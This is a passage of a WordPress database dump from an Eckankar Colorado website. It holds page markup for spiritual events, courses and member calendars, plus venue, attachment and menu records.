21:51:11','',0,'https://eckankar-colorado.org/?p=45701',16,'nav_menu_item','',0),(45842,2,'2019-07-21 17:16:22','2019-07-21 23:16:22','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 70px; padding-bottom: 9px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; color: #1d5791; font-size: 32px;\" data-font-family=\"Raleway\" data-font-weight=\"400\" data-font-style=\"\">Eck Soul Adventure Events</h2>\r\n<p class=\"\" style=\"border-width: 0px; color: #585858; font-size: 18px;\"><span class=\"\">ECK Soul Adventures are spiritual experiences that touch us at the very core of our being.&nbsp; Discover how to gracefully take the next step on your spiritual journey and accept a greater amount of God\'s love in your life.</span></p>\r\n<div class=\"row bg-editor-hr-wrap\" style=\"box-shadow: #cecece 0px 0px 0px 0px; margin-top: -10px; margin-bottom: -38px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<div>\r\n<p>&nbsp;</p>\r\n<div class=\"bg-hr bg-hr-2\" style=\"border-style: solid; border-width: 0px 0px 2px; box-shadow: #cecece 0px 0px 0px 0px inset; color: #1d5791;\"></div>\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-pricing_tables-4 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row color3-border-color\" style=\"margin-top: 30px; margin-bottom: 22px; border: 0px solid; padding-top: 0px;\">\r\n<div class=\"col-md-3 col-xs-12 col-sm-12 text-center col-lg-3\" style=\"border-width: 0px; padding-top: 0em;\">\r\n<p class=\"\">&nbsp;</p>\r\n<p class=\"mod-reset\"><img class=\"alignnone size-full wp-image-268044 bg-img bg-img-rounded-bottom-right bg-img-rounded-top-left aligncenter\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/Spiritual-Discussions.jpg\" alt=\"\" width=\"229\" height=\"153\"></p>\r\n</div>\r\n<div class=\"col-md-9 col-xs-12 col-sm-4 align-column-center text-center col-lg-9\" style=\"border-width: 0px; padding-top: 1em;\">\r\n<h2 class=\"\" style=\"padding-top: 0em; margin-top: 6px; text-align: left; color: #1d5791; border-width: 0px; text-transform: capitalize;\">Spiritual Discussions</h2>\r\n<p class=\"\" style=\"text-align: left;\">Explore your deepest spiritual questions with other truth seekers in a friendly, relaxed setting.</p>\r\n<p class=\"\" style=\"text-align: left;\">Covering a wide range of topics, these in-depth discussions include tools and techniques from the ECK teachings to help you take the next step in fulfilling your spiritual dreams.</p>\r\n<p class=\"\" style=\"text-align: left;\">Whether you come and share your thoughts, or just listen in, these hour to an hour-and-a-half discussions always offer something new to explore.</p>\r\n<p class=\"\" style=\"text-align: left;\">Find an ECK Spiritual Discussion Near You -- <a href=\"https://eckankar-colorado.org/central-colorado-public-calendar-mec/\">Central Colorado</a>,<a href=\"https://eckankar-colorado.org/colorado-springs-public-calendar-mec/\"> Colorado Springs</a>,<a href=\"https://eckankar-colorado.org/loveland-public-calendar-mec/\"> Loveland, </a><a href=\"https://eckankar-colorado.org/mountain-area-public-calendar-mec/\">Mountain Areas </a></p>\r\n</div>\r\n</div>\r\n<div class=\"row color3-border-color\" style=\"margin-top: 42px; margin-bottom: 22px; border: 0px solid; padding-top: 0px; padding-bottom: 0px;\">\r\n<div class=\"col-md-3 col-xs-12 col-sm-12 text-center col-lg-3\">\r\n<div class=\"row bg-editor-hr-wrap\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<div>\r\n<p>&nbsp;</p>\r\n<div><img class=\"alignnone wp-image-267687 size-full bg-img bg-img-rounded-bottom-right bg-img-rounded-top-left aligncenter\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/activities-sound-of-soul-events-2023.jpg\" alt=\"\" width=\"230\" height=\"153\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-9 col-xs-12 col-sm-4 align-column-center text-center col-lg-9\" style=\"text-align: left;\">\r\n<h2 class=\"\" style=\"padding-top: 0em; margin-top: 17px; text-align: left; color: #1d5791; border-width: 0px; text-transform: capitalize;\">Sound of Soul Event</h2>\r\n<p class=\"\" style=\"text-align: left;\">You are invited to experience the transforming power of HU.</p>\r\n<p class=\"\" style=\"text-align: left;\">HU is a sacred mantra—the Sound behind all sounds. An ancient name for God, HU is a carrier of love between God and Soul. Singing HU can bring healing for body, mind, and spirit, and align Soul with higher states of love, wisdom, and awareness. At a Sound of Soul event, you can join others in chanting this ancient mantra for ten to twenty minutes, followed by a&nbsp; short time in contemplation. Afterward, enjoy spiritual conversation with others of like heart.</p>\r\n<p class=\"\" style=\"text-align: left;\">Find a Sound of Soul Event Near You -- <a href=\"https://eckankar-colorado.org/central-colorado-public-calendar-mec/\">Central Colorado</a>,<a href=\"https://eckankar-colorado.org/colorado-springs-public-calendar-mec/\"> Colorado Springs</a>,<a href=\"https://eckankar-colorado.org/loveland-public-calendar-mec/\"> Loveland, </a><a href=\"https://eckankar-colorado.org/mountain-area-public-calendar-mec/\">Mountain Areas </a></p>\r\n</div>\r\n<div></div>\r\n<div></div>\r\n</div>\r\n<div class=\"row color3-border-color\" style=\"margin-top: 63px; margin-bottom: 22px; border: 0px solid; padding-top: 0px; padding-bottom: 0px;\">\r\n<div class=\"col-md-3 col-xs-12 col-sm-12 text-center col-lg-3\">\r\n<p class=\"mod-reset\"><img class=\"alignnone size-full wp-image-268042 bg-img bg-img-rounded-bottom-right bg-img-rounded-top-left aligncenter\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/ECK-Light-and-Sound-Service.jpg\" alt=\"\" width=\"229\" height=\"153\"></p>\r\n<div class=\"bg-box-cover color1-background-color color-3-text-contrast bg-background-color bg-box\" style=\"padding: 1em;\">\r\n<div class=\"row bg-editor-hr-wrap\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<div>\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-9 col-xs-12 col-sm-4 align-column-center text-center col-lg-9\" style=\"padding-top: 0em;\">\r\n<h2 class=\"\" style=\"padding-top: 0em; margin-top: -15px; text-align: left; border-width: 0px; text-transform: capitalize; color: #1d5791;\">ECK Light and Sound Service</h2>\r\n<p class=\"\" style=\"text-align: left;\">People of all faiths and beliefs are welcome to the ECK Light and Sound Service. You can expect, in some way, to have a new experience of God’s love!</p>\r\n<p class=\"\" style=\"text-align: left;\">Services last about one hour and may include features such as a speaker, light musical performances, panels, and group discussion. Services always include time to experience the Light and Sound of God with a HU song and brief contemplation time. Participation is respectfully each person’s choice.</p>\r\n<p class=\"color-1-text-contrast color1-background-color\" style=\"text-align: left;\">Find an ECK Light and Sound Service Near You -- <a href=\"https://eckankar-colorado.org/central-colorado-public-calendar-mec/\">Central Colorado</a>, <a href=\"https://eckankar-colorado.org/colorado-springs-public-calendar-mec/\">Colorado Springs</a>, <a href=\"https://eckankar-colorado.org/loveland-public-calendar-mec/\"> Loveland</a>, <a href=\"https://eckankar-colorado.org/mountain-area-public-calendar-mec/\">Mountain Areas </a></p>\r\n</div>\r\n</div>\r\n<div class=\"row color3-border-color\" style=\"margin-top: 30px; margin-bottom: 22px; border: 0px solid; padding-top: 0px;\">\r\n<div class=\"col-md-3 col-xs-12 col-sm-12 text-center col-lg-3\">\r\n<p>&nbsp;</p>\r\n<p class=\"mod-reset\" style=\"border-width: 0px; margin: 0px; padding: 0em;\"><img class=\"alignnone size-full wp-image-268041 bg-img bg-img-rounded-bottom-right bg-img-rounded-top-left aligncenter\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/Seminars.jpg\" alt=\"\" width=\"229\" height=\"153\"></p>\r\n<div class=\"row bg-editor-hr-wrap\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<div>\r\n<p>&nbsp;</p>\r\n<div></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-9 col-xs-12 col-sm-4 align-column-center text-center col-lg-9\" style=\"border-width: 0px; padding-top: 1em;\">\r\n<h2 class=\"\" style=\"padding-top: 0em; margin-top: 3px; text-align: left; color: #1d5791; border-width: 0px; text-transform: capitalize; margin-bottom: 10px;\">ECK Soul Adventure Seminars</h2>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px;\">An ECK Soul Adventure Seminar can help you explore all the spiritual skills and talents that lie within you to navigate life with greater ease.</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px;\">Experience inspiring talks and presentations, music performances, and more. You will also meet a community of like-hearted people who respect spiritual freedom and love truth.</p>\r\n<p class=\"\" style=\"text-align: left;\">Discover more about your own unique journey home to God!</p>\r\n<p class=\"\" style=\"text-align: left;\">Find ECK Soul Adventure Seminars Near You -- <a href=\"https://eckankar-colorado.org/central-colorado-public-calendar-mec/\">Central Colorado</a>, <a href=\"https://eckankar-colorado.org/colorado-springs-public-calendar-mec/\">Colorado Springs</a>,<a href=\"https://eckankar-colorado.org/loveland-public-calendar-mec/\"> Loveland, </a><a href=\"https://eckankar-colorado.org/mountain-area-public-calendar-mec/\">Mountain Areas </a></p>\r\n</div>\r\n</div>\r\n<div class=\"row color3-border-color\" style=\"margin-top: 30px; margin-bottom: 22px; border: 0px solid; padding-top: 0px; padding-bottom: 0px;\">\r\n<div class=\"col-md-3 col-xs-12 col-sm-12 text-center col-lg-3\">\r\n<div class=\"row bg-editor-hr-wrap\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<div>\r\n<p>&nbsp;</p>\r\n<div><img class=\"alignnone wp-image-268236 size-full bg-img bg-img-rounded-bottom-right bg-img-rounded-top-left aligncenter\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/Easy-Way.jpg\" alt=\"\" width=\"229\" height=\"153\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-9 col-xs-12 col-sm-4 align-column-center text-center col-lg-9\">\r\n<h2 class=\"\" style=\"padding-top: 0em; margin-top: 17px; text-align: left; color: #1d5791; border-width: 0px; text-transform: capitalize;\">Easy Way</h2>\r\n<p class=\"\" style=\"text-align: left;\"><em><i>The Easy Way</i></em>&nbsp;is a spiritual self-discovery course offered to new students of Eckankar. Whatever your goals are in life, <em><i>The Easy Way</i></em>&nbsp;helps you see and pursue them from a higher spiritual perspective.</p>\r\n<p class=\"\" style=\"text-align: left;\">This home-study course contains twelve monthly lessons that include inspirational content, spiritual exercises, workbook activities, and a CD of excerpts from Sri Harold Klemp’s talks. It is also available online.</p>\r\n<p class=\"\" style=\"text-align: left;\">Topics include:</p>\r\n<ul class=\"\" style=\"text-align: left;\">\r\n	<li>In Soul You Are Free</li>\r\n	<li>Reincarnation—Why You Came to Earth Again</li>\r\n	<li>Can We Live in a World without Love?</li>\r\n	<li>The God Worlds—Where No One Has Gone Before?</li>\r\n</ul>\r\n<p class=\"\" style=\"text-align: left;\">and so much more.</p>\r\n<p class=\"\" style=\"text-align: left;\"><a href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener noreferrer\">Begin the adventure of a lifetime!</a></p>\r\n<p class=\"\" style=\"text-align: left;\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Eckankar Events','','publish','closed','closed','','eckankar-events','','','2023-06-16 13:02:25','2023-06-16 19:02:25','',0,'https://eckankar-colorado.org/?page_id=45842',0,'page','',0),(46112,2,'2019-07-21 17:31:45','2019-07-21 23:31:45',' ','','','publish','closed','closed','','46112','','','2019-12-26 14:51:11','2019-12-26 21:51:11','',0,'https://eckankar-colorado.org/46112/',13,'nav_menu_item','',0),(46829,2,'2019-07-21 21:17:57','2019-07-22 03:17:57','','eck-activities-sos-2','','inherit','open','closed','','eck-activities-sos-2','','','2019-07-21 21:17:57','2019-07-22 03:17:57','',45842,'https://eckankar-colorado.org/wp-content/uploads/2019/07/eck-activities-sos-2.jpg',0,'attachment','image/jpeg',0),(49522,2,'2019-07-22 11:52:28','2019-07-22 17:52:28','','Spiritual Exercises','','publish','closed','closed','','soul-travel-the-easy-way','','','2019-07-22 11:53:01','2019-07-22 17:53:01','',0,'https://eckankar-colorado.org/?post_type=sp_easy_accordion&#038;p=49522',0,'sp_easy_accordion','',0),(49868,2,'2019-07-22 12:03:57','2019-07-22 18:03:57','','ECK FAQ','','publish','closed','closed','','eck-faq','','','2019-07-22 13:12:29','2019-07-22 19:12:29','',0,'https://eckankar-colorado.org/?post_type=responsive_accordion&#038;p=49868',0,'responsive_accordion','',0),(51581,2,'2019-07-22 14:54:34','2019-07-22 20:54:34','','Donation authorization form 2016-04-07','','inherit','open','closed','','donation-authorization-form-2016-04-07','','','2019-07-22 14:54:34','2019-07-22 20:54:34','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/07/Donation-authorization-form-2016-04-07.pdf',0,'attachment','application/pdf',0),(51767,2,'2019-07-22 15:07:14','2019-07-22 21:07:14','','Pueblo Community College, Student Center','','publish','closed','closed','','pueblo-community-college-student-center','','','2019-07-22 15:07:14','2019-07-22 21:07:14','',0,'https://eckankar-colorado.org/?post_type=tribe_venue&#038;p=51767',0,'tribe_venue','',0),(51883,2,'2019-07-22 15:08:35','2019-07-22 21:08:35','','Loveland ECK Center','','publish','closed','closed','','loveland-eck-center','','','2019-07-22 15:08:35','2019-07-22 21:08:35','',0,'https://eckankar-colorado.org/?post_type=tribe_venue&#038;p=51883',0,'tribe_venue','',0),(51976,2,'2019-07-22 15:09:48','2019-07-22 21:09:48','','ECK Temple of Colorado','','publish','closed','closed','','eck-temple-of-colorado','','','2019-07-22 15:09:48','2019-07-22 21:09:48','',0,'https://eckankar-colorado.org/?post_type=tribe_venue&#038;p=51976',0,'tribe_venue','',0),(52069,2,'2019-07-22 15:11:11','2019-07-22 21:11:11','','Colorado Springs ECK Center','','publish','closed','closed','','colorado-springs-eck-center','','','2019-07-22 15:11:11','2019-07-22 21:11:11','',0,'https://eckankar-colorado.org/?post_type=tribe_venue&#038;p=52069',0,'tribe_venue','',0),(52162,2,'2019-07-22 15:12:03','2019-07-22 21:12:03','','Center for Inner Peace','','publish','closed','closed','','center-for-inner-peace','','','2019-07-22 15:12:03','2019-07-22 21:12:03','',0,'https://eckankar-colorado.org/?post_type=tribe_venue&#038;p=52162',0,'tribe_venue','',0),(52324,2,'2019-07-22 15:30:08','2019-07-22 21:30:08','<p><span style=\"font-size: 16pt; color: #f28a27;\">“TBA”</span></p>\r\n<p>The ECK Light and Sound Service is a community event offered by Eckankar for spiritual seekers of all faiths and religious backgrounds. It is an uplifting event where you can reflect on and connect with the divine aspect within yourself. You will hear inspiring spiritual stories, experience the HU chant, and be able to speak with other like-hearted spiritual seekers.</p>\r\n<p>You are invited to come and experience spiritual growth and fellowship as you explore what could be your next spiritual step.</p>','ECK Light & Sound Service','','publish','closed','closed','','eck-light-sound-service','','','2020-12-02 15:16:48','2020-12-02 22:16:48','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=52324',0,'tribe_events','',0),(55589,2,'2019-07-22 17:21:07','2019-07-22 23:21:07','','Event Calendars','','publish','closed','closed','','event-calendars','','','2019-12-26 14:51:11','2019-12-26 21:51:11','',0,'https://eckankar-colorado.org/?p=55589',2,'nav_menu_item','',0),(56319,2,'2019-07-22 21:45:28','2019-07-23 03:45:28','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 50px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n<p>[ninja_form id=8]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Central Colorado Organization Leadership','','publish','closed','closed','','central-colorado-organization-leadership','','','2020-08-06 09:12:06','2020-08-06 15:12:06','',79666,'https://eckankar-colorado.org/?page_id=56319',0,'page','',0),(56560,2,'2019-07-22 21:53:49','2019-07-23 03:53:49','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 50px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n<p class=\"\">[ninja_form id=12]&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Colorado Springs Organization Leadership','','publish','closed','closed','','colorado-springs-organization-leadership','','','2020-08-06 09:12:18','2020-08-06 15:12:18','',79666,'https://eckankar-colorado.org/?page_id=56560',0,'page','',0),(56657,2,'2019-07-22 21:55:23','2019-07-23 03:55:23','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 50px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\">&nbsp;</p>\r\n<p class=\"\">[ninja_form id=16]&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Loveland Organization Leadership','','publish','closed','closed','','loveland-organization-leadership','','','2020-08-06 09:12:32','2020-08-06 15:12:32','',79666,'https://eckankar-colorado.org/?page_id=56657',0,'page','',0),(56754,2,'2019-07-22 21:58:57','2019-07-23 03:58:57','','Western Slope Organization Leadership','','draft','closed','closed','','western-slope-organization-leadership','','','2019-10-12 13:48:15','2019-10-12 19:48:15','',0,'https://eckankar-colorado.org/?page_id=56754',0,'page','',0),(56851,2,'2019-07-22 22:00:12','2019-07-23 04:00:12','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 50px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n<p class=\"\">[ninja_form id=18]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Northwestern Colorado Organization Leadership','','publish','closed','closed','','northwestern-colorado-organization-leadership','','','2020-08-06 09:12:41','2020-08-06 15:12:41','',79666,'https://eckankar-colorado.org/?page_id=56851',0,'page','',0),(64579,2,'2019-07-28 14:25:26','2019-07-28 20:25:26','','co-springs-location-B','','inherit','open','closed','','co-springs-location-b','','','2019-07-28 14:25:26','2019-07-28 20:25:26','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/07/co-springs-location-B.jpg',0,'attachment','image/jpeg',0),(64822,2,'2019-07-28 15:10:49','2019-07-28 21:10:49','','','','inherit','open','closed','','olympus-digital-camera-4','','','2019-08-15 20:45:47','2019-08-16 02:45:47','',32074,'https://eckankar-colorado.org/wp-content/uploads/2019/07/loveland-center-sm.jpg',0,'attachment','image/jpeg',0),(64990,2,'2019-07-28 15:26:19','2019-07-28 21:26:19','','eck-temple-co-sm','','inherit','open','closed','','eck-temple-co-sm','','','2019-07-28 15:26:19','2019-07-28 21:26:19','',31882,'https://eckankar-colorado.org/wp-content/uploads/2019/07/eck-temple-co-sm.jpg',0,'attachment','image/jpeg',0),(65663,2,'2019-07-28 16:58:00','2019-07-28 22:58:00','','newsletter-gpx-sm-1','','inherit','open','closed','','newsletter-gpx-sm-1','','','2019-07-28 16:58:00','2019-07-28 22:58:00','',7160,'https://eckankar-colorado.org/wp-content/uploads/2019/07/newsletter-gpx-sm-1.png',0,'attachment','image/png',0),(68102,2,'2019-07-28 21:39:40','2019-07-29 03:39:40','<div class=\"tmpl-call_to_action-12 boldgrid-section dynamic-gridblock background-fixed\" style=\"color: #1d1d1d; box-shadow: #cecece 0px 0px 0px 0px inset; background-image: linear-gradient(to left, rgba(255, 255, 255, 0.05), rgba(255, 255, 255, 0.05)), url(\'https://eckankar-colorado.org/wp-content/uploads/2023/10/tree-path-5.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/10/tree-path-5.jpg\" data-bg-overlaycolor=\"rgba(255,255,255,0.05)\" data-bg-overlaycolor-alpha=\"0.05\" data-bg-overlaycolor-class=\"1\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 75px; padding-bottom: 300px;\">\r\n<div class=\"col-lg-3 col-md-12 col-sm-12 col-xs-12\"></div>\r\n<div class=\"col-md-8 col-sm-10 col-xs-12 text-center col-lg-6\" style=\"text-align: left; padding: 0em; background-color: rgba(255, 255, 255, 0); box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<blockquote class=\"color1-border-color\" style=\"margin: 52px 16px 20px auto; border-style: none; border-width: 0px; color: #585858; padding: 0em 2em 1em 5%; border-radius: 8px; background-color: none; width: 100%;\">\r\n<h1 class=\"\" style=\"text-transform: capitalize; font-size: 106px; letter-spacing: 2px; margin-top: 52px; box-shadow: #cecece 0px 0px 0px 0px; padding-left: 0em; margin-left: auto; margin-right: auto; text-align: center; width: auto; font-family: \'Alegreya SC\'; font-weight: 400; line-height: 89px; text-shadow: #ffffff 0px 0px 56px; color: #ad7a05;\" data-font-family=\"Alegreya SC\" data-font-weight=\"400\" data-font-style=\"\">Initiate Pages</h1>\r\n</blockquote>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-testimonial-10 boldgrid-section dynamic-gridblock background-parallax\" style=\"color: #1d1d1d; background-position: 50% 50%; background-size: cover; background-color: #f5f2eb;\" data-bg-overlaycolor=\"rgba(255, 255, 255, 0.8)\">\r\n<div class=\"container-fluid\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 0px;\">\r\n<div class=\"col-md-10 col-sm-8 col-xs-12 text-center col-lg-12\" style=\"padding: 2em; box-shadow: rgba(0, 0, 0, 0.1) 0px 4px 6px -1px, rgba(0, 0, 0, 0.06) 0px 2px 4px -1px;\">\r\n<p class=\"\" style=\"font-size: 24px; font-family: Raleway; font-weight: 400;\" data-font-family=\"Raleway\" data-font-weight=\"400\" data-font-style=\"\">These pages are for those who have enrolled in Eckankar’s Spiritual Living Courses.<br>\r\nAll are welcome to explore the benefits of the ECK courses and initiation&nbsp;<a href=\"https://www.eckankar.org/engage/advanced-spiritual-living/eck-initations/\" target=\"_blank\" rel=\"noopener\">here</a>.</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-call_to_action-1 boldgrid-section dynamic-gridblock background-parallax\" style=\"background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/09/web-promo-bk-6.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/09/web-promo-bk-6.jpg\">\r\n<div class=\"container-fluid\">\r\n<div class=\"row\" style=\"padding-bottom: 23px; padding-top: 23px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n<div class=\"col-md-7 col-sm-8 col-xs-12 col-lg-4\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<div class=\"bg-box-cover bg-box bg-alpha-879 bg-background-color color1-background-color color-1-text-contrast\" style=\"padding: 30px 5%; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-alpha=\"0.82\" data-bg-uuid=\"bg-alpha-879\">\r\n<p class=\"\" style=\"font-weight: 600; text-transform: none; font-size: 22px; line-height: 24px; color: #3e3e3e;\" data-font-weight=\"600\">Now Open For Registration</p>\r\n<p class=\"bg-font-family-alt\" style=\"color: #b67d00; font-size: 43px; line-height: 47px;\">2023-2024<br>\r\nInitiate&nbsp;<br>\r\nSatsang Classes</p>\r\n<p class=\"bg-font-family-alt\" style=\"font-size: 17px; line-height: 27px; color: #3e3e3e;\">An ECK Satsang class is a gathering of ECK initiates who choose to come together once or twice a month to further their spiritual understanding through study of the ECK discourses.</p>\r\n<p class=\"\"><a class=\"btn btn-raised btn-rounded btn-color-1\" href=\"https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/\" rel=\"noopener\">Register Now</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-services-14 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container-fluid\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 64px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\" style=\"box-shadow: #cecece 0px 0px 0px 0px;\">\r\n<p class=\"\" style=\"text-align: center; font-size: 27px; text-transform: capitalize; font-family: Raleway; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px; padding-bottom: 1em; color: #ad7a05;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">INITIATE EVENT CALENDARS</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 54px; background-color: #ffffff;\">\r\n<div class=\"col-md-3 col-sm-4 col-xs-12 text-center col-lg-3\">\r\n<h4 class=\"\" style=\"text-transform: uppercase; font-family: \'Open Sans\'; font-weight: 500;\" data-font-family=\"Open Sans\" data-font-weight=\"500\" data-font-style=\"\">Central Colorado</h4>\r\n<p class=\"\" style=\"margin-right: -15px; margin-left: -15px;\"><img class=\"bg-img alignnone wp-image-205232 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2019/12/eck-temple-member-cal-promo.jpg\" alt=\"Clear mountain stream with driftwood near the shore\" width=\"411\" height=\"231\"></p>\r\n<p class=\"wow headShake\" style=\"margin-top: -50px; text-align: center;\" data-wow-duration=\"1s\" data-wow-delay=\"1s\"><a class=\"color1-background-color color-3-text-contrast bg-background-color btn btn-rounded btn-regular\" href=\"https://eckankar-colorado.org/central-colorado-member-calendar-mec/\">Go Now!</a></p>\r\n</div>\r\n<div class=\"col-md-3 col-sm-4 col-xs-12 text-center col-lg-3\" data-bg-color-1=\"rgb(41, 100, 219)\" data-bg-color-2=\"rgb(255, 255, 255)\" data-bg-direction=\"to bottom\">\r\n<h4 class=\"\" style=\"text-transform: uppercase; font-family: \'Open Sans\'; font-weight: 500;\" data-font-family=\"Open Sans\" data-font-weight=\"500\" data-font-style=\"\">colorado springs</h4>\r\n<p class=\"\" style=\"margin-right: -15px; margin-left: -15px;\"><img class=\"bg-img alignnone wp-image-252359 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/cosprings-member-cal-promo.jpg\" alt=\"\" width=\"411\" height=\"231\"></p>\r\n<p class=\"wow headShake\" style=\"margin-top: -50px; text-align: center;\" data-wow-duration=\"1s\" data-wow-delay=\"1s\"><a class=\"color1-background-color color-3-text-contrast bg-background-color btn btn-rounded btn-regular\" href=\"https://eckankar-colorado.org/colorado-springs-member-calendar-mec/\">Go Now!</a></p>\r\n</div>\r\n<div class=\"col-md-3 col-sm-4 col-xs-12 text-center col-lg-3\">\r\n<h4 class=\"\" style=\"text-transform: uppercase; font-family: \'Open Sans\'; font-weight: 500;\" data-font-family=\"Open Sans\" data-font-weight=\"500\" data-font-style=\"\">loveland</h4>\r\n<p class=\"\" style=\"margin-right: -15px; margin-left: -15px;\"><img class=\"bg-img alignnone wp-image-205233 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/loveland-member-cal-promo.jpg\" alt=\"Green meadow overlooking mountains with clouds in the background\" width=\"411\" height=\"231\"></p>\r\n<p class=\"wow headShake\" style=\"margin-top: -50px; text-align: center;\" data-wow-duration=\"1s\" data-wow-delay=\"1s\"><a class=\"color1-background-color color-3-text-contrast bg-background-color btn btn-rounded btn-regular\" href=\"https://eckankar-colorado.org/loveland-member-calendar-mec/\">Go Now!</a></p>\r\n</div>\r\n<div class=\"col-md-3 col-sm-4 col-xs-12 text-center col-lg-3\">\r\n<h4 class=\"\" style=\"text-transform: uppercase; font-family: \'Open Sans\'; font-weight: 500; letter-spacing: 0px;\" data-font-family=\"Open Sans\" data-font-weight=\"500\" data-font-style=\"\">Mountain Areas</h4>\r\n<p class=\"\" style=\"margin-right: -15px; margin-left: -15px;\"><img class=\"bg-img alignnone wp-image-205233 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/12/mountain-area-member-cal-promo.jpg\" alt=\"Fall foliage and a mountain stream\" width=\"411\" height=\"231\"></p>\r\n<p class=\"wow headShake\" style=\"margin-top: -50px; text-align: center;\" data-wow-duration=\"1s\" data-wow-delay=\"1s\"><a class=\"color1-background-color color-3-text-contrast bg-background-color btn btn-rounded btn-regular\" href=\"https://eckankar-colorado.org/mountain-area-member-calendar-mec/\">Go Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-testimonial-10 boldgrid-section dynamic-gridblock background-parallax\" style=\"color: #1d1d1d; background-position: 50% 50%; background-size: cover; background-color: #f5f2eb;\" data-bg-overlaycolor=\"rgba(255, 255, 255, 0.8)\">\r\n<div class=\"container-fluid\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 0px;\">\r\n<div class=\"col-md-1 col-sm-2 col-xs-12 col-lg-1\"></div>\r\n<div class=\"col-md-10 col-sm-8 col-xs-12 text-center col-lg-10\" style=\"padding: 2em;\">\r\n<p class=\"h3\" style=\"font-weight: 600; margin-top: 20px; margin-bottom: 20px; font-family: Raleway; font-size: 24px; text-transform: none; font-style: italic; border-width: 0px; color: #3e3e3e;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"italic\"><i class=\"fa bg-inserted-icon fa-quote-left\" style=\"font-size: 35px; box-shadow: #cecece 0px 0px 0px 0px inset; color: #d5b56b;\" aria-hidden=\"true\">&nbsp;&nbsp; </i>We are personally responsible for our own state of consciousness. As Soul unfolds toward total freedom, It understands total responsibility must be accepted for every thought and action.&nbsp;&nbsp;</p>\r\n<h4 class=\"color3-color bg-font-family-alt\" 